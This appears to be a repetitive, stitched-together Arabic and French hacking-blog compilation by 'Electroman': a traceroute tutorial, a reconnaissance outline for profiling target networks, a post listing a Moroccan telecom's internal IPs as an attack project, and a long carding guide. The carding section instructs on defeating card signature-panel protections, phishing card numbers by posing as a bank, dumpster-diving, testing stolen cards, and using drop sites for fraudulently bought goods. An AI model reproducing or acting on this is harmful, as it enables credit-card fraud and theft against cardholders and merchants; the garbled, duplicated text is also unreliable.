فيقوم بارسال الحزمة مرة أخرى لكن بعمر يساوي 2 و بذلك يحصل على رد النقطة الثانيه. و يكرر العمليه حتى يصل الى العنوان فيقوم الحاسب المقصود بالرد من اي منفذ مفتوح لديه.
طريقة استخدام الأمر Traceroute
من نافذه الدوس أكتب الأمر التالي و سنستخدم موقع www.linux.org
او يمكن استخدام رقم تعريف الشبكة IP
C:> tracert 198.182.196.56
لأيقاف امر التتبع أضغط (Ctrl+C)
لحفظ نتيجة التتبع في ملف أضف
tracert www.pmail.com > tracert.txt
ELectroman
أذا رغبت في اضافه بيانات تتبع عدة مواقع في نفس الملف أضف
tracert www.rpmfind.net > tracert.txt
الأمر Traceroute وهو من أوامر الدوس ويستخدم لتتبع المسار حتى الوصول الى العنوان او الموقع المطلوب تتبع المسار له.
فكره تتبع المسار قائمه على فكره بسيطة وهي تزويد حزمه البيانات المرسله من الحاسب بخانه تسمى (Time-to-live) او تختصر بـ TTL و المقصود بها زمن الحياه للحزمة. يوضع في تلك الخانه رقم على سبيل المثال (3) و هذا يعني ان الحزمة ستعيش ثلاثه قفزات (Router) او خادم (Server) خلال تجولها عبر الشبكه.
الذي يحدث كالتالي:
لنسمي النقطة التي يكون فيها محول او خادم في الشبكه بنقطة التوزيع.
يقوم الحاسب بأرسال الحزمة و فيها محدد عمرها برقم وهو TTL عند وصول الحزمة لنقطة التوزيع الأولى (للمحول الأول في الشبكه (Roter) او الخادم) تقوم نقطة التوزيع بتنقيص هذا الرقم بمقدار واحد ثم ترسل الحزمة للنقطة التاليه.
عندما تصل الحزمة لنقطة توزيع بحيث يكون عمر الحزمة صفر بعد انقاص واحد منها ترسل نقطة التوزيع رد لمصدر الحزمة (حاسبك) تخبره عن موت الحزمة (اي توقفها عند تلك النقطة) و ضمن الرد تكون هناك المعلومات.
من الضروري وضع عمر للحزمة و الا ستعج الشبكات بحزم تائه تتنقل من نقطة الى نقطة بدون هدى.
ماذا يحدث عند استخدام الأمر Traceroute ؟
يقوم الحاسب بوضع عمر الحزمة 1 ثم يرسلها فيصله الرد من نقطه التوزيع الأولى (بالعزاء).
فيقوم بارسال الحزمة مرة أخرى لكن بعمر يساوي 2 و بذلك يحصل على رد النقطة الثانيه. و يكرر العمليه حتى يصل الى العنوان فيقوم الحاسب المقصود بالرد من اي منفذ مفتوح لديه.
طريقة استخدام الأمر Traceroute
من نافذه الدوس أكتب الأمر التالي و سنستخدم موقع www.linux.org
او يمكن استخدام رقم تعريف الشبكة IP
C:> tracert 198.182.196.56
لأيقاف امر التتبع أضغط (Ctrl+C)
لحفظ نتيجة التتبع في ملف أضف
tracert www.pmail.com > tracert.txt
ELectroman
أذا رغبت في اضافه بيانات تتبع عدة مواقع في نفس الملف أضف
tracert www.rpmfind.net > tracert.txt
تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
و سيتناول الموضوع التالي:-
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7.2 )
ب- ملقمات whois الهامه علي مستوي الانترنت
ج- استخدام الاداه sam spade علي ويندوز
د- استخدام الاداه traceroute من سطر اوامر لينكس و الاداه tracert في ويندوز
2 - تقفي اثر الشبكه الداخليه و اسماء نطاقتها
أ-استخدام الاداه nslookup من سطر اوامر لينكس او من سطر الاوامر في ويندوز 2000
3 - معرفه نوع نظام التشغيل
أ-استخدام الاداه المتعدده المهام gif langard
ب-استخدام موقع netcraft لتحديد نظام التشغيل
4 - البحث الحر في الانترنت لتجميع اكبر قدر من المعلومات عن الشبكه الهدف
5 - التقاط التعليقات البرمجيه
أ - استخدام خاصيه view source في المتصفح لقرائه التعليقات البرمجيه
6 - طرق وصل اجزاء الشبكات الداخليه لتكوين شبكه كبير(vpn , remote acces)
7-استخدام اليونكس شيل لعمل الاستعلامات التس تحتاج فيها الي استخدام لينكس عبر الانترنت
أ - طريقه التسجيل في يونكس شيل مجاني
ب - اختيار الشيل المناسب
8 - وصلات لتنزيل الادوات المطلوبه و اماكن الحصول عليها
==================================================
تقفي الاثر لمنظمه معينه
==================================================
ان تقفي الاثر هو احد اهم الخطوات التي يقوم بها الهكر الحقيقي ليكي يضع و يكون صوره في ذهنه عن طبيعه الهدف
و اسهل الامور هو تقفي اثر التكوينات المرتبطه بالانترنت و ذلك من حيث :-
نظام التشغيل
و خدمات tcp و udp
والبروتوكول العامله
و معرفه اسماء الميادين العامه و التقاط بانرز البورتات المنصته و خدمات انصاتها
تعداد بروتوكول SNMP بروتوكول التحكم بالشبكه البسيط
و معرفه الشيرز عبر بروتوكول SMB
اسماء المستخدمين و المستخدم الفعال
طول الباسورد و قوتها و امكانيه كسرها
من يملكون الصلاحيه بالوصول عبر ACLs
معرفه حوائط النيران و انواعها و تكنولوجيتها
امكانيه استخدام اتصالات مشفره
الطرق العامله في ال Remote administration
الويب سيرفرز
الثغرات العامله
و غيرها
ايضا تقفي اثر الانترانت او الشبكات المحليه
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
من حيث البروتوكولات المستخدمه tcp/ip ipx/spx appletalk و غيرها
طرق ربط اجزاء الشبكه هل يتم عبر direct connections , VPN , Remote acces
ارقام الوصول البعيد
اليات التحكم بالوصول
و الكثيير جدا جدا منه ما سوف نستخدمه الان و منه ما سيستخدم فيما بعد في مستوي اعلي قليلا
الان نبدأ بالدرس الفعلي بعد تلك المقدمه الطويله
==================================================
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
==================================================
يتم ذلك باستخدام الكثير من الادوات التي اكثرها يعمل علي لينكس و بعضها علي ويندوز
و سوف تكون البدايه مع استخدام الاداه whois من سطر اوامر لينكس
Electroman
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7.2 )
ب- ملقمات whois الهامه علي مستوي الانترنت
ج- استخدام الاداه sam spade علي ويندوز
د- استخدام الاداه traceroute من سطر اوامر لينكس و الاداه tracert في ويندوز
2 - تقفي اثر الشبكه الداخليه و اسماء نطاقتها
أ-استخدام الاداه nslookup من سطر اوامر لينكس او من سطر الاوامر في ويندوز 2000
3 - معرفه نوع نظام التشغيل
أ-استخدام الاداه المتعدده المهام gif langard
ب-استخدام موقع netcraft لتحديد نظام التشغيل
4 - البحث الحر في الانترنت لتجميع اكبر قدر من المعلومات عن الشبكه الهدف
5 - التقاط التعليقات البرمجيه
أ - استخدام خاصيه view source في المتصفح لقرائه التعليقات البرمجيه
6 - طرق وصل اجزاء الشبكات الداخليه لتكوين شبكه كبير(vpn , remote acces)
7-استخدام اليونكس شيل لعمل الاستعلامات التس تحتاج فيها الي استخدام لينكس عبر الانترنت
أ - طريقه التسجيل في يونكس شيل مجاني
ب - اختيار الشيل المناسب
8 - وصلات لتنزيل الادوات المطلوبه و اماكن الحصول عليها
==================================================
تقفي الاثر لمنظمه معينه
==================================================
ان تقفي الاثر هو احد اهم الخطوات التي يقوم بها الهكر الحقيقي ليكي يضع و يكون صوره في ذهنه عن طبيعه الهدف
و اسهل الامور هو تقفي اثر التكوينات المرتبطه بالانترنت و ذلك من حيث :-
نظام التشغيل
و خدمات tcp و udp
والبروتوكول العامله
و معرفه اسماء الميادين العامه و التقاط بانرز البورتات المنصته و خدمات انصاتها
تعداد بروتوكول SNMP بروتوكول التحكم بالشبكه البسيط
و معرفه الشيرز عبر بروتوكول SMB
اسماء المستخدمين و المستخدم الفعال
طول الباسورد و قوتها و امكانيه كسرها
من يملكون الصلاحيه بالوصول عبر ACLs
معرفه حوائط النيران و انواعها و تكنولوجيتها
امكانيه استخدام اتصالات مشفره
الطرق العامله في ال Remote administration
الويب سيرفرز
الثغرات العامله
و غيرها
ايضا تقفي اثر الانترانت او الشبكات المحليه
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
من حيث البروتوكولات المستخدمه tcp/ip ipx/spx appletalk و غيرها
طرق ربط اجزاء الشبكه هل يتم عبر direct connections , VPN , Remote acces
ارقام الوصول البعيد
اليات التحكم بالوصول
و الكثيير جدا جدا منه ما سوف نستخدمه الان و منه ما سيستخدم فيما بعد في مستوي اعلي قليلا
الان نبدأ بالدرس الفعلي بعد تلك المقدمه الطويله
==================================================
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
==================================================
يتم ذلك باستخدام الكثير من الادوات التي اكثرها يعمل علي لينكس و بعضها علي ويندوز
و سوف تكون البدايه مع استخدام الاداه whois من سطر اوامر لينكس
Electroman
better than ever
un site pour les hackeurs professionnelles pour leurs rechers
http://www.google.com/intl/xx-hacker
http://www.google.com/intl/xx-hacker
NEWS SUR MAROC TLECOME GPRS CONNECTION
EXCLUSIVE
projet fucking ass maroc telecome
sous code
FAMT
bjr chér-e-s clientèles
hier et aujourd'hui jé fé des recherches sur le proxy ip des poins acces suivant mmsiam
www.imgprs.ma
et je trouve des choses intersectant es telle que :
point acee mmsiam ip proxy et 10.16.35.50 : l ip racine de serveur et :
A1 192.168.171.131 ((((ip racine )))
A2 192.168.173.36
A3 192.168.240.2
A4 192.168.241.20
A5 10.16.35.50
point acce : www.iamgprs.ma ip proxy 212.217.54.133 lip racin de serveur et :
B1 192.168.171.131 ((((ip racine )))
B2 192.168.173.36
B3 192.168.240.2
si vous avez remarquez le A1 ip racine de serveur point acce iamgprs et le meme sur le point d'acce sur mmsiam et puisque le traget des ip et le mem de puis A1 a B1 A2 b2 ..... et puisk aussi une trou de sécurité et déclencher sur le point accee mmsiam alors cest bientaux www.iamgprs.ma
vos commentaires svp
mr electroman
projet fucking ass maroc telecome
sous code
FAMT
bjr chér-e-s clientèles
hier et aujourd'hui jé fé des recherches sur le proxy ip des poins acces suivant mmsiam
www.imgprs.ma
et je trouve des choses intersectant es telle que :
point acee mmsiam ip proxy et 10.16.35.50 : l ip racine de serveur et :
A1 192.168.171.131 ((((ip racine )))
A2 192.168.173.36
A3 192.168.240.2
A4 192.168.241.20
A5 10.16.35.50
point acce : www.iamgprs.ma ip proxy 212.217.54.133 lip racin de serveur et :
B1 192.168.171.131 ((((ip racine )))
B2 192.168.173.36
B3 192.168.240.2
si vous avez remarquez le A1 ip racine de serveur point acce iamgprs et le meme sur le point d'acce sur mmsiam et puisque le traget des ip et le mem de puis A1 a B1 A2 b2 ..... et puisk aussi une trou de sécurité et déclencher sur le point accee mmsiam alors cest bientaux www.iamgprs.ma
vos commentaires svp
mr electroman
carding
الجزء الاول:
هناك على الاقل 3 انواع من اجهزه الحمايه على الcredit card التي من المفروض الا تعرفها كمستخدم عادي و هي: ..
أ-account number رقم الحساب
ب-signature panel لوحه الامضاء
ج-the magnetic strip الستريب الممغنط
و سنقوم في هذا الجزء-بإذن الله-بشرح كل واحده على حده
أ- the account number رقم الحساب
--------------------------------
البطاقه الحمايه الاجتماعيه بها 9 ارقام ... رقم التليفون المنزلي، متضمن كود المنطقه،به 10ارقام ... لكن بطاقه master card بها 20 رقم..لماذا كل هذه الارقام؟؟
ليس مهما حسابيا لأي credit-card account ان يكون به اكثر من 8 ارقام..كل حامل كارتcardholder يجب (طبعا) ان يكون له رقم متفرد..visa و master card عندهم تقريبا حوالي 65,000,000 حامل كارت..لذا فنظام ترقيمهم يجب ان يحمل على الاقل هذا العدد من الارقام المتاحه
هناك 100,000,000 احتمال ممكن في رقم مكون كن 8 ارقام 00000000,00000001,00000002 حتى 99999999 لذا 8 ارقام كفايه جدا.ليسمح بتطور مستقبلي يكفي مثلا ان يجعلهم 9ارقام فهذا يزيد الاحتمالات لبلايين..و لكن في الحقيقه visa card بها 30 رقما و احيانا اكثر.american express بها 15 رقم.carte blanche به 10 ارقام.. لكن في هذه الشركات العملاقه يخططون لمستقبل كبر حتى يستطيعون مستقبلا استيعاب بلايين المشتركين و الارقام الزائده للحمايه..
مثلا رقم كارت visa card هو 4211 503 417 268 (من اليمين للشمال لكن في الانجليزيه تكتب بالعكس)..كل شراء بالكارت يجب ان تدخل رقم حسابك..لكن الكمبيوتر قد يرتكب خطأ و يسجل مثلا 4211 503 417 286
فائده نظام الترقيم الـ13ـري هو ان اي حامل لvisa card ممكن ان يكون حامل لأي هذه الارقام..هناك 10 تريليون احتمال.فقط 65 مليون من هذه الاحتمالات هي ارقام حقيقيه و فعاله..و احتمالات الخطأ ستنخفض لنحو 1 في ال150الف !!!! ...
هناك ايضانظم ترقيم اكثر امنا..من الكوادرليون احتمال ممكن في نظام الamerican express الـ15ـري.فقط 11 مليون رقم حقيقي..نسبه الخطأ او التجربه للحصول على رقم حقيقي صدفه لا تتعدى ال1 في 90مليون!!!
اما نظام الmaste card الـ20ـي فهناك حوالي 100 كوانتيليون احتمال(100000000000000000000) لذا فالارقام العشوائيه التي قد تكون موجوده لا تتعدى ال1 في التريليون !!!!! ...
من الاشياء الاخرى.. هذا يجعل من الممكن لاعلانات التلفاز ان تدعوا حاملي الكروت للشراء عبر الهاتف.الoperators لا يرون الكروت و لا لوحه الامضاء..كيف يتأكدون من ان المتصل لديه credut card ؟؟
هو يؤسس ثقته على الحمايه المتمثله في نظام ترقيم الـaccount numbers..فلو واحد اتصل و اخترع رقم كارت..الرقم اكيد لن يكون رقم موجود.. و من السهل كشف زيفه، لكل الاسباب العمليه الطريقه الوحيده للحصول عاى account numberاصلي هو عن طريق قراءته من كارت ائتمان !!!...
ب- the Signature Panel رقم الحساب
---------------------------------
لا يجب عليك مسح لوحه الامضاء لو كنت تريد سرقه كارت! ربما تظن انه يجب كتابه اسم حامل الكارت.ربما ترى ان هذا رائع لو اردت ان تحصل على بعض المال من البنك،لأنهم سيجعلونك توقع على لوحه يجب ان تطابق الامضاء عالكارت.لو انت او اي احد اخر عمل هذا.عاجلا ستجد الكارت غير عامل..
بعض الكروت لها خلفيه مرسومه بحيث لو مسحت الامضاء تمسح الخلفيه.و هناك"بصمه اليد" المصممه على الamerican express،شعارات mastercard و visa المكرره على اللوح بتاعتهم.
هناك طرق اقوى للحمايه،يقال ان عندما تمسح الpanel كلمه سريه"VOID"،تظهر لمنع استخدام الكارت.Adminstation (احد كتاب الكتاب) ضحى ب15 كارت لتجربه هذه النظريه
الممحاه العاديه ستمسح الsignature panels لو بالراحه و ببطء.الpanels ستذوب بحته قماش و energine.هذه الطريق تذيب الpanels بنظافه.من ال15 كارت. 6 لم يوجد شئ تحت الpanel و 9 بهم كلمه VOID. في كل الحالات كانت مكتوبه بحروف صغيره و مكرره جنب بعض
---------------------
هذا هو كيفيه تصنيفهم
---------------------
\\\\\\\\\\\\\\\\
كروت بكلمه VOID
\\\\\\\\\\\\\\\
Bloomingdale's
Bonwit Teller
Chase Convenience Banking Card
First Interstate Bank Card
I.Manin
Joseph Magnin
Montgomer Ward
Visa(chase manhatten) 1
\\\\\\\\\\\\\\
كروت بدون VOID
\\\\\\\\\\\\\\
American Express Gold Card
Brodway
MasterCard (city bank)1
Neiman-Marcus
Robinson's
Saks Fifth Avenue
-------------------------
عندما قربوا للنور القوي كلمه VOID كانت واضحه خلال Bloomingdale's card حتى من دون تذويب الpanel!!
الطريقه للعب حول هذه الخاصيه!!
-----------------------------
هناك طريقه واحده فقط..
الدهن فوق الPANEL ! هذا سيعمل فقط لو الكارت ليس عليه رسوم.الكروت التي لها الوان صعبه ايضا تكون مستحيله(saks panel لونها greenish \-tan khaki colour!!!!)
ج-the magnetic strip الشريط الممغنط
------------------------------------
و آخر اداة حمايه هي في الخلف.شريط بني ممغنط هو الMagnetic strip.ربما تظن انه يحوي بعض المعلومات عن حامل الكارت.الشريط حقيقة لا يحوي معلومات اكثر مما يحوي جزء مماثل في شريط تسجيل!!.
الشريط لا يحوي معلومات غير رقم الحساب و معلومات اخرى مماثله.و اي معلومات اخرى يحتاجها automatic-teller transaction.
ايضا.تاريخ انتهاء الكارتcard expiration date..ليس واضحا اذا كان الidentification number مسجل على الشريط ام يتم استدعائه من كمبيوتر البنك.الكثير من الصرافات الآليه.لها secret limit من 3 محاولات لوضع الpersonal identification number الصحيح.بعد 3 محاولات خاطئه..يصنف الكارت على انه مسروق و يصبحeaten اي يدمر.
من الممكن لخبطه البيانات على الشريط بتمرير مغناطيس عليه!!!
كود لون bloomingdale
---------------------
فقط في قليل من الحالات.لون الكارت يعني شيئا...هناك الكروت الذهبيه لAmerican Express,Visa,MasterCard و هي للزبائن المفضلين..كارت الAir travel له لونان احمر و اخضر..و الاخضر افصل..و اكثر
النظم التي تتبع هذا النظام هي bloomingdale..ال5 الوان لكروت bloomingdale تحدد اي نوع من العملاء انت..الازرق هو لعمال الشركه انفسهم.و اللون الاساسي هو الاصفر..اما الاحمر يعطي حامله 3 شهور free intrest و يعطى للعملاء الذين يقومون دائما بشراءات كبيره.الكارت الفضي جيد للunlimited لكن عند السفر الcharges يجب ان تدفع خلال 30 يوم..الكارت الذهبي محفوظ لأفضل و اكبر عملاء البنك
---------------------
الجزء الثاني
---------------------
مقدمة الجزء الثاني:
---------------------
في هذا الجزء سنريكم بعض التقنيات الجديده التي تمكنك من احصول على الكروت لوحدك..سنذكر ايضا كيفيه التعرف على الكروت و معرفه ان كانت valid ام لا!!
-----------------------------------------------------------------------
اولا سأذكر طريقه TRW.و ان اعجبتك فأنا ارشح لك ان تحصل على كتاب Major havok&british bloke عن هذه الطريقه و سيعجبك كثيرا.(انا ابحث لو وجدته سأنشره هنا و على من يجده ان يتفضل بنشره!)
TRW(من فهمي لها اظن انها تخص المريكيين فقط..انا لم افهمها جيدا ارجوا ممن يعرف اكثر ان يخبرنا)
---
المودم بتاعك يجب ان يضبط هكذا:
Half duplex
7 bits
1 stop bit
even parity
dial-up:214-980-2524
اول ما تبقى online انتظر للTRW prompt و اضغط ctrl-g ،انتظر صوت beep .ثم،اكتب الID الرباعي الخاص بالstate التي يقطن بها الشخص الذي تريد بياناته...ثم اضغط RETURN.بعدها اكتب البيانات التيتريد معرفتها عن الشخص صاحب الكارت بالشكل التالي:
RTS ID/PASSWORD LASTNAME FIRSTNAME ...,STREET # FIRST CHARACTER OF STREET NAMEZIP CODE
طبعا كل هذا في نفس السطر..بعد هذا اضغط RETURN ، H-Y ، RETURN، CTRL-S
لشخص اخر قم بالكتابه بنفس الطريقه في سطر اخر
---------------------------------
getting credit limit and account #1
----------------------------------
ها هو حوار من الممكن استخدامه في الهاتف للصول على معلومات كهذه(أرأيتم..social engineering ..انه يستخدم في كل مجالات الهاكينج):
----------
انت:اهلا،هنا بنك امريكا نحن نتصل لنعلمك ان حد الvisa card الخاص بك قد ارتفع ل$1.200.00
الضحيه: لكن حد الكارت بتاعي كان دائما $10.000.00!!!!
انت: يبدو ان هناك مشكله في الكمبيوتر،ها الكارت بتاعك في متناول يدك؟هل ممكن ان تقوم بقراءه الارقام المكتوبه ؟
الضحيه: حسنا،انها 9834 864 874 9857
انت: شكرا.سأتحقق من هذا الخطأ بنفسي.حالا...
---------
طريقه اخرى هي الحصول على هذه الكروت هي الذهاب لمحل كبير و البحث في صحائف القمامه حوله و هي ما تسمى بالdumpsting (مقزز مش كده!)
-------------------------------------
\\\\\\\\\\\\\\\\\\
تحديد الكارت الذي حصلت عليه(روعه!!)
\\\\\\\\\\\\\\\\\
------------------------------
American Express
/--------------------------
= American Express =
= 37XN NXXXXX XXXXX =
= MM/Y1 THRU MM/Y2 Y1 =
= David Lightman AX=
\--------------------------/
الرقمين الاولين دائما 37.لو الN's بين 80 و 89 اذن فهو goldذهبي و لو الn 37 فهو platinium بلاتيني
اول تاريخ هو تاريخ الذي تلقى فيه david الكرت..اما التاريخ الثاني فهو تاريخ الانتهاءexpiration date اما الy1 فلا تعني شيئا
------------------------------
MasterCard
/--------------------------\
= MasterCard (citibank)=
= 5XXX XXXX XXXX XXXX =
= XXXX AAA DD-MM-YY MM/YY =
= David Lightman =
\--------------------------/
اظن انك ستفهم هذا الكارت بسهوله..شئ واحد يجب معرفته..هذا الكارت يبدأ دائما برقم 5
----------------------------
Visa
/--------------------------
= VISA =
= Chase Manhatten =
= =
= 4XXX XXX(X) XXX(X) XXX(X)=
= MM/YY MM/YY*VISA =
= David Lightman =
\--------------------------/
هذا الكارت سهل جدا معرفته اسمه embossed عالكارت(اي يظهر بالكاربون) هناك شئ جيد..يبدأ دائما 4333 او 4444
-----------------------------
Wells Fargo
/--------------------------\
= David Lightman =
= MM/YY - MM/YY =
= 4024 0071 XXX(X) XXX(X) =
= L _/ =
\--------------------------/
هذا من الكروت الظريفه..لو بدأ ب 4024 0071(اقلب شمال عشان تفهم) اذن فاعرف ان معك واحد.ايضا لو ال"-" بين التواريخ "*" فاعرف انه gold card و لو الL متبوعه ب'_/' بقت "C" فاعرف انه classic card و لو الL بقتP يبقى premier card.......
---------------------------
\\\\\\\\\\\\\
اختبار الكروت
\\\\\\\\\\\\
للأسف شباب هذه قطعه بسيطه لكن لم افهمها لذا سأكتبه بالانجليزيه و على من يفهمها ان يترجمها و ينشرها مع الشكر:
To determine if the cards are any good or not is pretty easy. You go into the store you ripped these things off from and look by their phone. You should see a number and almost allways a merchant number. Another way to find these numbers is to wait untill they dial the numbers. Try to remeber the numbers that they dial. This method is a little better for sometimes written numbers in the stores are forgotten about and might have been changed since the last time they had changed the written copy. Yes, some Target workers are smart enough to memorize a number, and mabye even a merchant number.
When you call this number, and you get passed all the "red tape", then ask if the credit card number is clear for the amount you want to spend.
Ask the operator to cancel the auto withdrawal and hope she will, not many operators are that dumb.
--------------|
الجزء الثالث |
--------------|
The Dropsite(مركز اسقاط المسروقات!!)
\\\\\\\\\\\\\
يجب ان تجد مكانا آمنا لكل الذي اشتريته بالبطاقات المزوره.لو كنت تريد ان تدخل في العميق،ابعثهم على منزلك!!
لتحصل على dropsite جيد يجب ان تجد منزل مهجور.لكن يجب ان يكون منظره كما ان به حياة...عندما تكون جاهزا لطلب الاشياء التي ستشتريها،افعل ذلك ليلا.و اترك رساله عالباب بأن لديك عمل ليلا و ان يتركوا المشتروات في الحديقه الخلفيه.هذه افضل طريقه في رأيي لكن.سأخبرك بطرق اخرى.
استأجر مكانا لمده بسيطه..حتى تحصل على ما تريد و الغي الايجار و اختره مكانا بعيدا عن منزلك حتى تستطيع بعدها الاختفاء من المنطقه.
و هذه اخر طريقه تعتمد عالهاتف اقرأ هذه المحادثه بيني و شركه سوني:
انا:اهلا.انا فلان الفلاني و انا نهتم بالعرض ا
لخاص بجهاز سوني الجديد.و احب ان اتكلم مع احد في الامر
العامل:اكيد.سأخبرك بكل ما يهمك(...كلام عن الجهاز...)
انا:حسنا..يبدوا ان هذا ما احتاجه فعلا.هل استطيع شراءه بالفيزا و يأتي ابن عمي بعد ذلك لأخذه لأني مريض و لا استطيع الخروج؟؟
العامل:طبعا نحن في الخدمه ...الخ..
لكن انا لا احبذ هذه الطريقه..انا افضل الاولى.لكن as u like
الآن اليك تلك النصيحتين:
1-يفضل عندما تتصل للشراء ان تفعل ذلك ليلا ..ساعتها يكون الoperators متعبون و لا يتذكرون ما حدث بعدها
2-اياك اياك من استخدام نفس الdropsite مرتين..عندما تستخدم مكانا ما و تنتهي..انسااااه تماما
و نصيحه اخيره:
الكثير من الهاكرز ماتوا بتلك الطريقه
Many hackers died that way
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
انتهى الكتاب......
ELEctroman
هناك على الاقل 3 انواع من اجهزه الحمايه على الcredit card التي من المفروض الا تعرفها كمستخدم عادي و هي: ..
أ-account number رقم الحساب
ب-signature panel لوحه الامضاء
ج-the magnetic strip الستريب الممغنط
و سنقوم في هذا الجزء-بإذن الله-بشرح كل واحده على حده
أ- the account number رقم الحساب
--------------------------------
البطاقه الحمايه الاجتماعيه بها 9 ارقام ... رقم التليفون المنزلي، متضمن كود المنطقه،به 10ارقام ... لكن بطاقه master card بها 20 رقم..لماذا كل هذه الارقام؟؟
ليس مهما حسابيا لأي credit-card account ان يكون به اكثر من 8 ارقام..كل حامل كارتcardholder يجب (طبعا) ان يكون له رقم متفرد..visa و master card عندهم تقريبا حوالي 65,000,000 حامل كارت..لذا فنظام ترقيمهم يجب ان يحمل على الاقل هذا العدد من الارقام المتاحه
هناك 100,000,000 احتمال ممكن في رقم مكون كن 8 ارقام 00000000,00000001,00000002 حتى 99999999 لذا 8 ارقام كفايه جدا.ليسمح بتطور مستقبلي يكفي مثلا ان يجعلهم 9ارقام فهذا يزيد الاحتمالات لبلايين..و لكن في الحقيقه visa card بها 30 رقما و احيانا اكثر.american express بها 15 رقم.carte blanche به 10 ارقام.. لكن في هذه الشركات العملاقه يخططون لمستقبل كبر حتى يستطيعون مستقبلا استيعاب بلايين المشتركين و الارقام الزائده للحمايه..
مثلا رقم كارت visa card هو 4211 503 417 268 (من اليمين للشمال لكن في الانجليزيه تكتب بالعكس)..كل شراء بالكارت يجب ان تدخل رقم حسابك..لكن الكمبيوتر قد يرتكب خطأ و يسجل مثلا 4211 503 417 286
فائده نظام الترقيم الـ13ـري هو ان اي حامل لvisa card ممكن ان يكون حامل لأي هذه الارقام..هناك 10 تريليون احتمال.فقط 65 مليون من هذه الاحتمالات هي ارقام حقيقيه و فعاله..و احتمالات الخطأ ستنخفض لنحو 1 في ال150الف !!!! ...
هناك ايضانظم ترقيم اكثر امنا..من الكوادرليون احتمال ممكن في نظام الamerican express الـ15ـري.فقط 11 مليون رقم حقيقي..نسبه الخطأ او التجربه للحصول على رقم حقيقي صدفه لا تتعدى ال1 في 90مليون!!!
اما نظام الmaste card الـ20ـي فهناك حوالي 100 كوانتيليون احتمال(100000000000000000000) لذا فالارقام العشوائيه التي قد تكون موجوده لا تتعدى ال1 في التريليون !!!!! ...
من الاشياء الاخرى.. هذا يجعل من الممكن لاعلانات التلفاز ان تدعوا حاملي الكروت للشراء عبر الهاتف.الoperators لا يرون الكروت و لا لوحه الامضاء..كيف يتأكدون من ان المتصل لديه credut card ؟؟
هو يؤسس ثقته على الحمايه المتمثله في نظام ترقيم الـaccount numbers..فلو واحد اتصل و اخترع رقم كارت..الرقم اكيد لن يكون رقم موجود.. و من السهل كشف زيفه، لكل الاسباب العمليه الطريقه الوحيده للحصول عاى account numberاصلي هو عن طريق قراءته من كارت ائتمان !!!...
ب- the Signature Panel رقم الحساب
---------------------------------
لا يجب عليك مسح لوحه الامضاء لو كنت تريد سرقه كارت! ربما تظن انه يجب كتابه اسم حامل الكارت.ربما ترى ان هذا رائع لو اردت ان تحصل على بعض المال من البنك،لأنهم سيجعلونك توقع على لوحه يجب ان تطابق الامضاء عالكارت.لو انت او اي احد اخر عمل هذا.عاجلا ستجد الكارت غير عامل..
بعض الكروت لها خلفيه مرسومه بحيث لو مسحت الامضاء تمسح الخلفيه.و هناك"بصمه اليد" المصممه على الamerican express،شعارات mastercard و visa المكرره على اللوح بتاعتهم.
هناك طرق اقوى للحمايه،يقال ان عندما تمسح الpanel كلمه سريه"VOID"،تظهر لمنع استخدام الكارت.Adminstation (احد كتاب الكتاب) ضحى ب15 كارت لتجربه هذه النظريه
الممحاه العاديه ستمسح الsignature panels لو بالراحه و ببطء.الpanels ستذوب بحته قماش و energine.هذه الطريق تذيب الpanels بنظافه.من ال15 كارت. 6 لم يوجد شئ تحت الpanel و 9 بهم كلمه VOID. في كل الحالات كانت مكتوبه بحروف صغيره و مكرره جنب بعض
---------------------
هذا هو كيفيه تصنيفهم
---------------------
\\\\\\\\\\\\\\\\
كروت بكلمه VOID
\\\\\\\\\\\\\\\
Bloomingdale's
Bonwit Teller
Chase Convenience Banking Card
First Interstate Bank Card
I.Manin
Joseph Magnin
Montgomer Ward
Visa(chase manhatten) 1
\\\\\\\\\\\\\\
كروت بدون VOID
\\\\\\\\\\\\\\
American Express Gold Card
Brodway
MasterCard (city bank)1
Neiman-Marcus
Robinson's
Saks Fifth Avenue
-------------------------
عندما قربوا للنور القوي كلمه VOID كانت واضحه خلال Bloomingdale's card حتى من دون تذويب الpanel!!
الطريقه للعب حول هذه الخاصيه!!
-----------------------------
هناك طريقه واحده فقط..
الدهن فوق الPANEL ! هذا سيعمل فقط لو الكارت ليس عليه رسوم.الكروت التي لها الوان صعبه ايضا تكون مستحيله(saks panel لونها greenish \-tan khaki colour!!!!)
ج-the magnetic strip الشريط الممغنط
------------------------------------
و آخر اداة حمايه هي في الخلف.شريط بني ممغنط هو الMagnetic strip.ربما تظن انه يحوي بعض المعلومات عن حامل الكارت.الشريط حقيقة لا يحوي معلومات اكثر مما يحوي جزء مماثل في شريط تسجيل!!.
الشريط لا يحوي معلومات غير رقم الحساب و معلومات اخرى مماثله.و اي معلومات اخرى يحتاجها automatic-teller transaction.
ايضا.تاريخ انتهاء الكارتcard expiration date..ليس واضحا اذا كان الidentification number مسجل على الشريط ام يتم استدعائه من كمبيوتر البنك.الكثير من الصرافات الآليه.لها secret limit من 3 محاولات لوضع الpersonal identification number الصحيح.بعد 3 محاولات خاطئه..يصنف الكارت على انه مسروق و يصبحeaten اي يدمر.
من الممكن لخبطه البيانات على الشريط بتمرير مغناطيس عليه!!!
كود لون bloomingdale
---------------------
فقط في قليل من الحالات.لون الكارت يعني شيئا...هناك الكروت الذهبيه لAmerican Express,Visa,MasterCard و هي للزبائن المفضلين..كارت الAir travel له لونان احمر و اخضر..و الاخضر افصل..و اكثر
النظم التي تتبع هذا النظام هي bloomingdale..ال5 الوان لكروت bloomingdale تحدد اي نوع من العملاء انت..الازرق هو لعمال الشركه انفسهم.و اللون الاساسي هو الاصفر..اما الاحمر يعطي حامله 3 شهور free intrest و يعطى للعملاء الذين يقومون دائما بشراءات كبيره.الكارت الفضي جيد للunlimited لكن عند السفر الcharges يجب ان تدفع خلال 30 يوم..الكارت الذهبي محفوظ لأفضل و اكبر عملاء البنك
---------------------
الجزء الثاني
---------------------
مقدمة الجزء الثاني:
---------------------
